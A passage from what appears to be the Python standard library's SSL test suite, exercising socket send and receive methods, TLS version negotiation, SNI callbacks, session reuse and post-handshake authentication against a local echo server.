sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with threading_helper.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
